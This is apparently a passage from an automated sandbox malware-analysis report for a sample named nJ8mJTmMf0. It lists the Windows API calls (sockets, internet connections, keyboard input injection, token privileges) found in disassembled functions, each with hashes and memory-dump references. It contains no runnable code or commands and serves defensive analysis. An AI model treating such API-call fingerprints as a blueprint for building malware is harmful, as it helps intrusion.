                                                    • Instruction Fuzzy Hash: 71C16C71A083119FC754DF28C48095ABBE6FF89314F14896EF8999B351D732E94ACF82
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 006783D8
                                                    • CoUninitialize.OLE32 ref: 006783E3
                                                      • Part of subcall function 0065DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0065DAC5
                                                    • VariantInit.OLEAUT32(?), ref: 006783EE
                                                    • VariantClear.OLEAUT32(?), ref: 006786BF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                    • String ID:
                                                    • API String ID: 780911581-0
                                                    • Opcode ID: 7dc962ae9c40eb80c77b742d829efb9af279f2699ed2eec949ef8427a61b95c9
                                                    • Instruction ID: 40d43d7f1a0b8b37bbb1113682028e928faebb68c04e6a5d36dde674b2bf7e59
                                                    • Opcode Fuzzy Hash: 7dc962ae9c40eb80c77b742d829efb9af279f2699ed2eec949ef8427a61b95c9
                                                    • Instruction Fuzzy Hash: 28A15975244701AFDB54DF68C489A5AB7E6FF88314F18844CF99A9B3A2CB30ED04CB56
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Variant$AllocClearCopyInitString
                                                    • String ID:
                                                    • API String ID: 2808897238-0
                                                    • Opcode ID: 92f0c30b55ef1d84254ea15b1f4e0bca34f0e2ca207f2dd793fcee6fe5e2c8a4
                                                    • Instruction ID: d67b993d1226316709047a3a4829178d84388077296dfe98df0df729d9f51a8c
                                                    • Opcode Fuzzy Hash: 92f0c30b55ef1d84254ea15b1f4e0bca34f0e2ca207f2dd793fcee6fe5e2c8a4
                                                    • Instruction Fuzzy Hash: 715118706487019BDB74AF65E881A6EB3E7AF08311F60881FFD46CB2D2DB309849DB15
                                                    APIs
                                                    • GetWindowRect.USER32(0131D810,?), ref: 00689AD2
                                                    • ScreenToClient.USER32(00000002,00000002), ref: 00689B05
                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00689B72
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientMoveRectScreen
                                                    • String ID:
                                                    • API String ID: 3880355969-0
                                                    • Opcode ID: 27c3224285c2343eac513060f3d14d2e8af3d121d1f7d03b772ae1b1e58a1e6a
                                                    • Instruction ID: adc5e217d1ee223c858844ab88dbffa5fa3d4282634d35c8938d35493cc236d5
                                                    • Opcode Fuzzy Hash: 27c3224285c2343eac513060f3d14d2e8af3d121d1f7d03b772ae1b1e58a1e6a
                                                    • Instruction Fuzzy Hash: 74510A74A00209AFCB14EF68D8859BE7BB6FF55324F148269F9159B390D770AD81CBA0
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00676CE4
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00676CF4
                                                      • Part of subcall function 00609997: __itow.LIBCMT ref: 006099C2
                                                      • Part of subcall function 00609997: __swprintf.LIBCMT ref: 00609A0C
                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00676D58
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00676D64
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                    • String ID:
                                                    • API String ID: 2214342067-0
                                                    • Opcode ID: 1940cc7c48d71d72cbb3621949fa3f4fae4f35959084d980f0ceaf8c83f59605
                                                    • Instruction ID: 555bdd8b9846ad8c792d0c4c8128bf68d50e5219143f3c664eee5bb6902fe7bb
                                                    • Opcode Fuzzy Hash: 1940cc7c48d71d72cbb3621949fa3f4fae4f35959084d980f0ceaf8c83f59605
                                                    • Instruction Fuzzy Hash: A8417F74780600AFEB64AF24DC86F6A76A7DF44B10F44805CFA599B2D3DA719D008B95
                                                    APIs
                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0068F910), ref: 006767BA
                                                    • _strlen.LIBCMT ref: 006767EC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID:
                                                    • API String ID: 4218353326-0
                                                    • Opcode ID: 526a357c6475599a034385b0f7135b12a906c9c5b6d4a3fd26d2ff7be5fa8c57
                                                    • Instruction ID: a4d88cdc259c0335199ca4a2a7d870738c1d51080aaa697035e578213d56edbb
                                                    • Opcode Fuzzy Hash: 526a357c6475599a034385b0f7135b12a906c9c5b6d4a3fd26d2ff7be5fa8c57
                                                    • Instruction Fuzzy Hash: B741D631A40504AFCB58EB64DCC5EAFB3ABEF44314F148159F81A972D2EB309D00CB65
                                                    APIs
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0066BB09
                                                    • GetLastError.KERNEL32(?,00000000), ref: 0066BB2F
                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0066BB54
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0066BB80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                    • String ID:
                                                    • API String ID: 3321077145-0
                                                    • Opcode ID: 87d4b85f6e46d81f4636100dadbae90969cc7daee5f52ddf578252b961099951
                                                    • Instruction ID: e4162855236706522cd33c9e9b1a93eaeeb79c78e1f22b6ee4c383bb6dba30ea
                                                    • Opcode Fuzzy Hash: 87d4b85f6e46d81f4636100dadbae90969cc7daee5f52ddf578252b961099951
                                                    • Instruction Fuzzy Hash: 0B413A39640610DFCB14EF59C584A5EBBE3EF49310B098498EC4A9B7A2CB34FD41CBA5
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00688B4D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: 3dc8ed3e1e8c4f03ca4939c70c7b7ab862b7b90250f790c5e453021f40c891eb
                                                    • Instruction ID: 67aef1804db00fed0a9b38acad25941244300a595da6eaf8328af9e21a1bcff4
                                                    • Opcode Fuzzy Hash: 3dc8ed3e1e8c4f03ca4939c70c7b7ab862b7b90250f790c5e453021f40c891eb
                                                    • Instruction Fuzzy Hash: 6831AEB4640204BFEB24AA58CC85FE937A7EB85320FA44716FA51D73E1DE30A9409755
                                                    APIs
                                                    • ClientToScreen.USER32(?,?), ref: 0068AE1A
                                                    • GetWindowRect.USER32(?,?), ref: 0068AE90
                                                    • PtInRect.USER32(?,?,0068C304), ref: 0068AEA0
                                                    • MessageBeep.USER32(00000000), ref: 0068AF11
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                    • String ID:
                                                    • API String ID: 1352109105-0
                                                    • Opcode ID: fcc42149266b7f4519a475d0b41614a49321e29f4f4d30b12442bb4dabd7acd5
                                                    • Instruction ID: b50365de8690ad219e53cef876f7fc1f261c296d423008f88d2036a8fb6792ac
                                                    • Opcode Fuzzy Hash: fcc42149266b7f4519a475d0b41614a49321e29f4f4d30b12442bb4dabd7acd5
                                                    • Instruction Fuzzy Hash: 76418170600115DFEB11EF98C888AA977F7FF88350F14866AE9149B351D730E842EF52
                                                    APIs
                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00661037
                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00661053
                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 006610B9
                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0066110B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: d75725ce2a0c10c29bd626e61c38c4671b834188b7ca5178ae6fc361053763b7
                                                    • Instruction ID: 6d090a0242d0d034c176f20c4641c41cb7096ff4b401b521f2903bfe8b33b498
                                                    • Opcode Fuzzy Hash: d75725ce2a0c10c29bd626e61c38c4671b834188b7ca5178ae6fc361053763b7
                                                    • Instruction Fuzzy Hash: 26315C30E40688AEFF308B668C05BFABBBBAB57310F0C431AE5805A2D1CB7549C19765
                                                    APIs
                                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00661176
                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00661192
                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 006611F1
                                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00661243
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: 9d414fd8b52ac999f3f009f6083668bb01566a12df1e395b7df7d939fe222983
                                                    • Instruction ID: 89fff33a729e294e8f75793671f6ecc57562683871c368c9427b3f5fcdf45fb4
                                                    • Opcode Fuzzy Hash: 9d414fd8b52ac999f3f009f6083668bb01566a12df1e395b7df7d939fe222983
                                                    • Instruction Fuzzy Hash: 41312830A4064CAEFF308B65CC157FABBABAB8B310F0C431EE6909A6D1C3754A959755
                                                    APIs
                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0063644B
                                                    • __isleadbyte_l.LIBCMT ref: 00636479
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006364A7
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006364DD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 3058430110-0
                                                    • Opcode ID: 3c43d97fa15bfcd63b2c6995b16cff39ba9603b9baabb672e926a425c4a39d6b
                                                    • Instruction ID: 6ec45623a16b4e7552ac5830b57dc7a2ef7d6e1e79492e7363b2ece2fc2b5a7f
                                                    • Opcode Fuzzy Hash: 3c43d97fa15bfcd63b2c6995b16cff39ba9603b9baabb672e926a425c4a39d6b
                                                    • Instruction Fuzzy Hash: 9B31AF31A00256BFDB218F65CC45AAA7BE6FF41310F15C529F8558B292D731D851DB90
                                                    APIs
                                                    • GetForegroundWindow.USER32 ref: 00685189
                                                      • Part of subcall function 0066387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00663897
                                                      • Part of subcall function 0066387D: GetCurrentThreadId.KERNEL32 ref: 0066389E
                                                      • Part of subcall function 0066387D: AttachThreadInput.USER32(00000000,?,006652A7), ref: 006638A5
                                                    • GetCaretPos.USER32(?), ref: 0068519A
                                                    • ClientToScreen.USER32(00000000,?), ref: 006851D5
                                                    • GetForegroundWindow.USER32 ref: 006851DB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                    • String ID:
                                                    • API String ID: 2759813231-0
                                                    • Opcode ID: 7f49b38801f7a6681a643b72b42d2b84a4291440f3fe603f2ca107846b7cc01c
                                                    • Instruction ID: 98e00a14abe7b892bdb6230d14599b2d25f4061625b97d2af1b2536d6374f88b
                                                    • Opcode Fuzzy Hash: 7f49b38801f7a6681a643b72b42d2b84a4291440f3fe603f2ca107846b7cc01c
                                                    • Instruction Fuzzy Hash: BA311071A00118AFDB44EFA5C8459EFB7FAEF98304F10406AE515E7242DA759E05CBA4
                                                    APIs
                                                      • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                    • GetCursorPos.USER32(?), ref: 0068C7C2
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0063BBFB,?,?,?,?,?), ref: 0068C7D7
                                                    • GetCursorPos.USER32(?), ref: 0068C824
                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0063BBFB,?,?,?), ref: 0068C85E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                    • String ID:
                                                    • API String ID: 2864067406-0
                                                    • Opcode ID: ad939ac43d6f6f59865cafe481cb46ce4b23a813b9deac3e45fc81780a586295
                                                    • Instruction ID: 91ebf646d6364a3260e374a51a6bd143dbe31da744bdd38854ca0297285eb579
                                                    • Opcode Fuzzy Hash: ad939ac43d6f6f59865cafe481cb46ce4b23a813b9deac3e45fc81780a586295
                                                    • Instruction Fuzzy Hash: 58317A75600018AFCB25DF58C898EEA7FBBEF49720F0446A9F9058B2A1C7319D51DBB4
                                                    APIs
                                                    • __setmode.LIBCMT ref: 00620BF2
                                                      • Part of subcall function 00605B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00667B20,?,?,00000000), ref: 00605B8C
                                                      • Part of subcall function 00605B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00667B20,?,?,00000000,?,?), ref: 00605BB0
                                                    • _fprintf.LIBCMT ref: 00620C29
                                                    • OutputDebugStringW.KERNEL32(?), ref: 00656331
                                                      • Part of subcall function 00624CDA: _flsall.LIBCMT ref: 00624CF3
                                                    • __setmode.LIBCMT ref: 00620C5E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                    • String ID:
                                                    • API String ID: 521402451-0
                                                    • Opcode ID: a8b40d820a19d1332bd033ec760265a03e9aa2c93a64aacac61b763b279ae8c1
                                                    • Instruction ID: 64cb3cdde18e2bf50167635fead23feb0a94ecf5cc9447d52b69edd875b30e6d
                                                    • Opcode Fuzzy Hash: a8b40d820a19d1332bd033ec760265a03e9aa2c93a64aacac61b763b279ae8c1
                                                    • Instruction Fuzzy Hash: 07112472A04A187EDB48B3B8BC429BE7B6B9F45320F14021EF104571D2DE715D868BA9
                                                    APIs
                                                      • Part of subcall function 00658652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00658669
                                                      • Part of subcall function 00658652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00658673
                                                      • Part of subcall function 00658652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00658682
                                                      • Part of subcall function 00658652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00658689
                                                      • Part of subcall function 00658652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0065869F
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00658BEB
                                                    • _memcmp.LIBCMT ref: 00658C0E
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00658C44
                                                    • HeapFree.KERNEL32(00000000), ref: 00658C4B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                    • String ID:
                                                    • API String ID: 1592001646-0
                                                    • Opcode ID: 1ba029af8acd3171f5c240e27e1e69f64b8898f624b59d8ec2e0e8f70fb12453
                                                    • Instruction ID: 58822603b5d343c1129e92d69541f882841c5814233f5b35da6b5d5013a3634a
                                                    • Opcode Fuzzy Hash: 1ba029af8acd3171f5c240e27e1e69f64b8898f624b59d8ec2e0e8f70fb12453
                                                    • Instruction Fuzzy Hash: CE219071E01208EFDB10DFA4C949BEEB7BAEF44356F144099E854B7240DB31AE0ACB60
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00671A97
                                                      • Part of subcall function 00671B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00671B40
                                                      • Part of subcall function 00671B21: InternetCloseHandle.WININET(00000000), ref: 00671BDD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Internet$CloseConnectHandleOpen
                                                    • String ID:
                                                    • API String ID: 1463438336-0
                                                    • Opcode ID: 20f7e5c3e121f1a115fe238232da3e8ce3f9f872d29ac5bba8d0391fea804544
                                                    • Instruction ID: 012dc4ec226f3b507179409f252190faa9f4d77db6236978e659f95e9a84cb83
                                                    • Opcode Fuzzy Hash: 20f7e5c3e121f1a115fe238232da3e8ce3f9f872d29ac5bba8d0391fea804544
                                                    • Instruction Fuzzy Hash: 8D21D131200601BFEB119F648C01FBAB7AFFF45B00F10811FFA099A650EB31D811ABA4
                                                    APIs
                                                      • Part of subcall function 0065F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0065E1C4,?,?,?,0065EFB7,00000000,000000EF,00000119,?,?), ref: 0065F5BC
                                                      • Part of subcall function 0065F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0065F5E2
                                                      • Part of subcall function 0065F5AD: lstrcmpiW.KERNEL32(00000000,?,0065E1C4,?,?,?,0065EFB7,00000000,000000EF,00000119,?,?), ref: 0065F613
                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0065EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0065E1DD
                                                    • lstrcpyW.KERNEL32(00000000,?), ref: 0065E203
                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,0065EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0065E237
                                                    Strings
                                                    Memory Dump Source
